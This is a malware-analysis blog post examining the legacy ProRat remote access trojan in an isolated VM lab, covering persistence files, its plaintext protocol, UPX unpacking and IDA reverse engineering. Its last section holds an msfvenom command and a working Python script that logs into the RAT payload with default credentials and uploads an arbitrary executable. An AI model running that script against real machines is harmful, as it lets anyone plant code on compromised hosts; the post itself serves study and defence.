<!DOCTYPE html><html lang="en-us" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[Studying] Analyzing ProRat | ISSAC/iss4cf0ng's blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ISSAC/iss4cf0ng's blog" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/About/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/Alien/"><span class="navItemTitle">Alien</span></a></li><li class="navItem"><a class="navBlock" href="/2026/01/28/2026-1-28-ToolsDuplexSpy-v2-0-0/"><span class="navItemTitle">DuplexSpy</span></a></li><li class="navItem"><a class="navBlock" href="/Notes/"><span class="navItemTitle">Notes</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[Studying] Analyzing ProRat</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-02-23T15:06:59.000Z" id="date"> 2026-02-23</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-03-20T13:47:22.786Z" id="updated"> 2026-03-20</time></div></span><br><span>Word Count: <div class="control">1.3k</div></span><br><span>Read Time: <div class="control">8 min</div></span></div></div><hr><div id="post-content"><h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>This article is part of my series: <a href="/InsideDifferentGenerationsOfRATs/">Inside Different Generations of RATs</a>. If you are interested in the full series, please refer to the linked article above.</p>
<p>This is the first time I have conducted reverse engineering analysis using IDA (Freeware) instead of Ghidra. I also experimented with more tools compared to my previous articles.</p>
<p align="center" class='item-img' data-src='/images/meme/mika_XD.png'><img src="/images/meme/mika_XD.png" width=200>
</p>

<h1 id="ProRat"><a href="#ProRat" class="headerlink" title="ProRat"></a>ProRat</h1><p>ProRat is a remote access tool designed for unauthorized remote access, released by PRO Group in the early 2000s. It adopts a client-server (C/S) architecture for communication. From a network perspective, the ProRat controller GUI can function as both a server and a client.</p>
<p>The term “server” may be confusing from a modern perspective. In early-generation RATs, a “server” executable referred to the payload deployed on the victim machine, while a “client” referred to the application used to control the victim machine. As firewall technologies evolved and network security improved, attackers gradually shifted from direct connections to reverse connections.</p>
<p>To avoid confusion, this article uses the following terms:</p>
<ul>
<li>Controller: attacker-side application</li>
<li>Payload: executable deployed on the victim machines</li>
</ul>
<h1 id="Experimental-Environment-Setup"><a href="#Experimental-Environment-Setup" class="headerlink" title="Experimental Environment Setup"></a>Experimental Environment Setup</h1><p>To safely conduct malware analysis, the environment should be isolated using virtual machines. Under no circumstances should malware be executed on a personal or production system.</p>
<div class="table-container">
<table>
<thead>
<tr>
<th>Tool</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>ExeInfo PE</td>
<td>Executable analysis tool used to detect packers, compilers, and basic file properties</td>
</tr>
<tr>
<td>Detect It Easy (DIE)</td>
<td>File identification tool used to detect packers, protectors, and compiler signatures</td>
</tr>
<tr>
<td>RegShot</td>
<td>Registry comparison tool used to monitor changes made to the Windows registry</td>
</tr>
<tr>
<td>UPX</td>
<td>Open-source executable packer used to compress and decompress binaries</td>
</tr>
<tr>
<td>Wireshark</td>
<td>Network protocol analyzer used to capture and inspect live or recorded traffic</td>
</tr>
<tr>
<td>IDA (Freeware)</td>
<td>Disassembler used for software reverse engineering</td>
</tr>
</tbody>
</table>
</div>
<hr>
<div class="table-container">
<table>
<thead>
<tr>
<th>Device</th>
<th>IP Address</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows XP x86 (VM)</td>
<td>192.168.85.2</td>
<td>Victim machine used for executing both the controller and payload</td>
</tr>
<tr>
<td>Windows 10 x64 (VM)</td>
<td>192.168.85.3</td>
<td>Analysis machine used for reverse engineering</td>
</tr>
<tr>
<td>Kali Linux (VM)</td>
<td>192.168.85.4</td>
<td>Protocol re-implementation testing</td>
</tr>
</tbody>
</table>
</div>
<p>The two virtual machines were configured within an isolated internal network to prevent unintended external communication. If you want to know how to set up your experimental environment, please view:</p>
<ul>
<li><a href="https://iss4cf0ng.github.io/2026/02/21/2026-2-21-HowToSetupYourExpEnv/">How to Setup Your Experimental Environment for Malware Analysis</a></li>
<li><a href="https://iss4cf0ng.github.io/2026/02/21/2026-2-21-WinXpVMWareTool/">Installing VMware Tools on Windows XP and Windows 95 with VMware WorkStation 17</a></li>
</ul>
<blockquote>
<p>In this article, I used IDA Freeware to conduct reverse engineering. Note that IDA Freeware requires internet for decompilation, while IDA Pro does not. Since the price of IDA Pro might be unaffordable for independent users (including myself), I enabled internet access (NAT configuration) for static analysis. You should be cautious and avoid launching the payload, even inside a virtual machine, to prevent unintended external communication.</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/21.png'><img src="/images/article/2026-2-23-ProRAT/21.png" width=600>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/22.png'><img src="/images/article/2026-2-23-ProRAT/22.png" width=600>
</p>

<h1 id="Usage"><a href="#Usage" class="headerlink" title="Usage"></a>Usage</h1><p>The GUI of controller is illustrated below:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/4.png'><img src="/images/article/2026-2-23-ProRAT/4.png" width=600>
</p>

<p>Create a payload using the provided feature:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/1.png'><img src="/images/article/2026-2-23-ProRAT/1.png" width=500>
</p>

<p>ProRat allows users to configure various options when building the payload:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/2.png'><img src="/images/article/2026-2-23-ProRAT/2.png" width=500>
    <img src="/images/article/2026-2-23-ProRAT/3.png" width=500>
</p>

<p>Before deploying the payload, launch <strong>RegShot</strong>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/5.png'><img src="/images/article/2026-2-23-ProRAT/5.png" width=400>
</p>

<p>After deploying the payload, <strong>RegShot</strong> showed that many registry keys were modified or added:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/6.png'><img src="/images/article/2026-2-23-ProRAT/6.png" width=1000>
</p>

<p>Several files were added for persistence:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">C:\WINDOWS\system\sservice.exe<br>C:\WINDOWS\system32\fservice.exe<br>C:\WINDOWS\system32\reginv.dll<br>C:\WINDOWS\system32\winkey.dll<br>C:\WINDOWS\services.exe<br></code></pre></td></tr></table></figure></p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/7.png'><img src="/images/article/2026-2-23-ProRAT/7.png" width=800>
</p>

<h1 id="Protocol-Analysis"><a href="#Protocol-Analysis" class="headerlink" title="Protocol Analysis"></a>Protocol Analysis</h1><p>ProRat transfers data in plain text without any protection. It uses different integer values to identify different C2 commands:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/8.png'><img src="/images/article/2026-2-23-ProRAT/8.png" width=500>
    <img src="/images/article/2026-2-23-ProRAT/9.png" width=500>
</p>

<p>Notice that ProRat assigns a different port number for its features:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/11.png'><img src="/images/article/2026-2-23-ProRAT/11.png" width=600>
</p>

<p>It uses different port for screenshot:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/12.png'><img src="/images/article/2026-2-23-ProRAT/12.png" width=600>
</p>

<p>Furthermore, it assigns different port for remote plugins and file uploading:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/15.png'><img src="/images/article/2026-2-23-ProRAT/15.png" width=600>
</p>

<p>While analyzing the remote plugins feature, a suspicious executable was detected by <strong>WindowsDefender</strong>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/13.png'><img src="/images/article/2026-2-23-ProRAT/13.png" width=400>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/14.png'><img src="/images/article/2026-2-23-ProRAT/14.png" width=400>
</p>

<p>Based on the <strong>MZ</strong> symbol observed in the packet, we can infer that the remote plugin mechanism of ProRat works as follows: It drops a specific executable into the local <code>%TEMP%</code> directory, uploads it to the compromised machine, and the payload executes the plugin file and returns the result to the controller.</p>
<h1 id="Reverse-Engineering"><a href="#Reverse-Engineering" class="headerlink" title="Reverse Engineering"></a>Reverse Engineering</h1><p>Unlike my previous articles, this time I conducted reverse engineering using IDA (Freeware).</p>
<p>Both <strong>ExeInfo</strong> and <strong>DIE (Detect It Easy)</strong> confirmed the payload is packed with <strong>UPX</strong>. In addition, it was compiled using Visual Studio C/C++:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/10.png'><img src="/images/article/2026-2-23-ProRAT/10.png" width=600>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/16.png'><img src="/images/article/2026-2-23-ProRAT/16.png" width=700>
</p>

<p><strong>ExeInfo</strong> also showed that the controller application is packed with an unknown packer named <strong>ProCrypt</strong>. I initially assumed that this packer was developed by PRO Group, the author(s) for this tool, but I then found out it doesn’t obstruct the reverse engineering work.</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/18.png'><img src="/images/article/2026-2-23-ProRAT/18.png" width=600>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/19.png'><img src="/images/article/2026-2-23-ProRAT/19.png" width=700>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/34.png'><img src="/images/article/2026-2-23-ProRAT/34.png" width=700>
</p>

<p>We can easily unpack the payload using <code>upx.exe</code>:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&gt; upx -d server.exe -o unpacked.exe<br></code></pre></td></tr></table></figure></p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/16.png'><img src="/images/article/2026-2-23-ProRAT/16.png" width=800>
</p>

<p>Alternatively, we can manually unpack the payload. If you are interested in manually unpacking UPX and ASPack, please <a href="https://iss4cf0ng.github.io/2026/02/27/2026-2-27-UnpackingUpxAndAspack/">read this</a></p>
<p>Open the unpacked payload with IDA:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/20.png'><img src="/images/article/2026-2-23-ProRAT/20.png" width=700>
</p>

<p>Notice that the API names were not shown in <strong>Imports</strong> view. This is likely due to the compiler’s behavior (e.g., Visual C++), which may import functions by ordinal.</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/23.png'><img src="/images/article/2026-2-23-ProRAT/23.png" width=600>
</p>

<p>IDA Freeware can display the corresponding names of the ordinal values at the bottom:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/27.png'><img src="/images/article/2026-2-23-ProRAT/27.png" width=600>
</p>

<p>On the other hand, there are several simple methods to resolve this problem. The first method is to open <code>C:\Windows\SysWOW64\ws_32.dll</code> in IDA and navigate to <strong>Exports</strong> view:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/24.png'><img src="/images/article/2026-2-23-ProRAT/24.png" width=700>
</p>

<blockquote>
<p>Important: Since the payload is an <strong>x86 (32-bit)</strong> executable, you should open <code>C:\Windows\SysWOW64\ws_32.dll</code> instead of <code>C:\Windows\System32\ws_32.dll.exe</code>.</p>
</blockquote>
<p>You can also obtain the ordinal value using <strong>CFF Explorer</strong> or <strong>dumpbin.exe</strong>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/25.png'><img src="/images/article/2026-2-23-ProRAT/25.png" width=700>
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">dumpbin.exe C:\Windows\SysWOW64\ws_32.dll<br></code></pre></td></tr></table></figure>
<blockquote>
<p>Note that the output is sorted by RVA rather than by ordinal value.</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/26.png'><img src="/images/article/2026-2-23-ProRAT/26.png" width=600>
</p>

<p>Click the item with ordinal value <code>16</code> (which is <code>0x10</code>, corresponding to <code>recv</code>):</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/27.png'><img src="/images/article/2026-2-23-ProRAT/27.png" width=600>
</p>

<p>Select <strong>Jump to xref to operand</strong> or press the hotkey <strong>X</strong>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/28.png'><img src="/images/article/2026-2-23-ProRAT/28.png" width=600>
</p>

<p>Navigate to the corresponding function:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/29.png'><img src="/images/article/2026-2-23-ProRAT/29.png" width=600>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/30.png'><img src="/images/article/2026-2-23-ProRAT/30.png" width=600>
</p>

<p>We can also locate the message handler by searching for specific keywords:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/31.png'><img src="/images/article/2026-2-23-ProRAT/31.png" width=600>
</p>

<p>Eventually, we can identify the message handler within the ProRat payload:</p>
<p align="center" class='item-img' data-src='/images/article/2026-2-23-ProRAT/32.png'><img src="/images/article/2026-2-23-ProRAT/32.png" width=800>
</p>

<h1 id="Protocol-Re-Implementation-And-Abuse"><a href="#Protocol-Re-Implementation-And-Abuse" class="headerlink" title="Protocol Re-Implementation And Abuse"></a>Protocol Re-Implementation And Abuse</h1><p>Since ProRat uses plain text as network communication. It is vulnerable to MITM (Man-in-the-Middle) attacks, which may allow attackers to obtain credentials. Furthermore, the file upload feature can be abused:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$ msfvenom -p windows/messagebox TEXT=&quot;msf hello world&quot; --platform windows -a x86 -f exe &gt; msf.exe<br></code></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">import socket<br>import re<br>import time<br><br>SERV_IP = &#x27;192.168.85.2&#x27;<br>SERV_PORT = 5112<br><br>def extract_port(resp):<br>    match = re.search(r&#x27;\((.*?)\)&#x27;, resp)<br>    if not match:<br>        raise ValueError(&#x27;No PASV data found in the response.&#x27;)<br><br>    numbers = match.group(1).split(&#x27;,&#x27;)<br>    if len(numbers) != 6:<br>        raise ValueError(&#x27;Invalid PASV response format.&#x27;)<br><br>    v1 = int(numbers[4])<br>    v2 = int(numbers[5])<br><br>    port = (v1 * 256) + v2<br><br>    return port<br><br>def main():<br>    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>    sock.connect((SERV_IP, SERV_PORT))<br><br>    print(sock.recv(1024))<br>    sock.send(b&#x27;123456\r\n&#x27;)<br>    print(sock.recv(1024))<br>    sock.send(b&#x27;USER ProRat\r\n&#x27;)<br>    print(sock.recv(1024))<br>    sock.send(b&#x27;PASS 123456\r\n&#x27;)<br>    print(sock.recv(1024))<br>    sock.send(b&#x27;CWD .\r\n&#x27;)<br>    print(sock.recv(1024))<br>    sock.send(b&#x27;PASV\r\n&#x27;)<br>    resp = sock.recv(1024)<br>    print(resp)<br><br>    sock.send(b&#x27;STOR malware.exe\r\n&#x27;)<br><br>    resp = resp.replace(b&#x27;\r\n&#x27;, b&#x27;&#x27;).decode()<br>    port = extract_port(resp)<br>    print(port)<br><br>    evil_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>    evil_sock.connect((SERV_IP, port))<br><br>    BLOCK = 4096<br>    MARKER = b&quot;END_OFF_FILE&quot;<br><br>    with open(&quot;msf.exe&quot;, &quot;rb&quot;) as f:<br>        while True:<br>            chunk = f.read(BLOCK)<br>            if not chunk:<br>                break<br><br>            if len(chunk) &lt; BLOCK:<br>                remaining_space = BLOCK - len(chunk)<br><br>                data = chunk + MARKER<br>                data = data.ljust(BLOCK, b&quot;\x00&quot;)<br><br>                evil_sock.send(data)<br>                break<br>            else:<br>                evil_sock.send(chunk)  <br><br>    time.sleep(1)<br>    evil_sock.shutdown(socket.SHUT_WR)<br><br>    print(sock.recv(1024))<br>    print(sock.recv(1024))<br><br>if __name__ == &#x27;__main__&#x27;:<br>    main()<br></code></pre></td></tr></table></figure>
<h1 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h1><p>Most legacy RATs (from the early 2000s) transmit data in plain text, they are vulnerable to MITM attacks and protocol re-implementation abuse.</p>
<p>Although this was my first time using IDA Freeware for malware analysis, the experience provided valuable insights into both legacy RAT architectures and practical reverse engineering workflows.</p>
<p>If you consider it acceptable to perform static analysis on a machine with internet access, IDA Freeware can be a practical option.</p>
<h1 id="THANKS-FOR-READING"><a href="#THANKS-FOR-READING" class="headerlink" title="THANKS FOR READING"></a>THANKS FOR READING</h1><div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2026/02/24/2026-2-24-UnofficialRedistribution/">← Next [Reverse Engineering] How I Found a Suspicious Redistribution of My Project</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/02/22/2026-2-22-ConfigureVirtualNetwork/">[Learning] How to Configure the Network of Your Virtual Machine using VMware Workstation Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="utterances-sel"></button></div><div id="utterances-container"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/" width="200" id="logo"><img src="https://avatars.githubusercontent.com/u/110074064?v=4" alt="Logo"></a><h1 id="Dr"><a href="/">ISSAC</a></h1><div id="description"><p>Everything is failing...</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/iss4c_f0ng/"><i class="fab fa-twitter" alt="X"></i></a></div></div><div id="music"></div><div class="music-box"><hr style="border:1px solid #ccc; margin:10px 0"><p class="music-title">Feeling exhausted? Let's enjoy (やさしい) music!</p><p style="text-align:center; position: relative"><img class="music-anime" id="anime-img" src="/images/meme/himari_coffee.2.jpg" width="150" height="200"></p><div><button class="music-btn" id="music-toggle">▶ Play Music</button><span id="music-index" style="margin-left:10px"></span></div><hr style="border:1px solid #ccc; margin:10px 0"><audio id="bg-music"><source src="/mp3/music/music_1.mp3" type="audio/mpeg"></audio><script>document.addEventListener("DOMContentLoaded", function () {
  var playlist = [
    "/mp3/music/music_1.mp3",
    "/mp3/music/sugar_story.mp3",
    "/mp3/music/story_music_box.mp3",
    "/mp3/music/musa.mp3",
    "/mp3/music/air.mp3",
    "/mp3/music/last_page.mp3",
    "/mp3/music/midnight_trip.mp3",
  ];

  var current = 0;
  const audio = document.getElementById("bg-music");
  const btn = document.getElementById("music-toggle");
  const indexDisplay = document.getElementById("music-index");

  indexDisplay.innerText = `Currently: ${current + 1} / ${playlist.length}`;

  btn.addEventListener("click", function () {
    if (audio.paused) {
      audio.src = playlist[current];
      audio.play();
      btn.innerText = "⏸ Pause Music";
    } else {
      audio.pause();
      btn.innerText = "▶ Play Music";
    }
  });

  audio.addEventListener("ended", function() {
    current = (current + 1) % playlist.length;
    audio.src = playlist[current];
    audio.play();
    indexDisplay.innerText = `Currently: ${current + 1} / ${playlist.length}`;
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const animeImg = document.getElementById("anime-img");

  animeImg.addEventListener("click", function() {
    
    const tip = document.createElement("div");
    tip.innerText = "?";
    tip.style.position = "absolute";
    tip.style.top = "-50px";
    tip.style.left = "50%";
    tip.style.transform = "translateX(-50%)";
    tip.style.backgroundColor = "#fff";
    tip.style.color = "rgb(16, 174, 11)";
    tip.style.padding = "2px 6px";
    tip.style.border = "1px solid #ccc";
    tip.style.borderRadius = "8px";
    tip.style.boxShadow = "0 3px 6px rgba(0,0,0,0.2)";
    tip.style.fontSize = "50px";
    tip.style.fontWeight = "bold";
    tip.style.zIndex = "1000";
    tip.style.opacity = "1";
    tip.style.transition = "opacity 1s, top 1s";
    
    animeImg.parentElement.appendChild(tip);

    setTimeout(() => {
      tip.style.opacity = "0";
      tip.style.top = "-60px";
      setTimeout(() => tip.remove(), 1000);
    }, 2000);
  });
});
</script></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ProRat"><span class="toc-number">2.</span> <span class="toc-text">ProRat</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Experimental-Environment-Setup"><span class="toc-number">3.</span> <span class="toc-text">Experimental Environment Setup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Usage"><span class="toc-number">4.</span> <span class="toc-text">Usage</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Protocol-Analysis"><span class="toc-number">5.</span> <span class="toc-text">Protocol Analysis</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reverse-Engineering"><span class="toc-number">6.</span> <span class="toc-text">Reverse Engineering</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Protocol-Re-Implementation-And-Abuse"><span class="toc-number">7.</span> <span class="toc-text">Protocol Re-Implementation And Abuse</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Conclusion"><span class="toc-number">8.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#THANKS-FOR-READING"><span class="toc-number">9.</span> <span class="toc-text">THANKS FOR READING</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/custom.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script src="/js/slide.js"></script></body></html>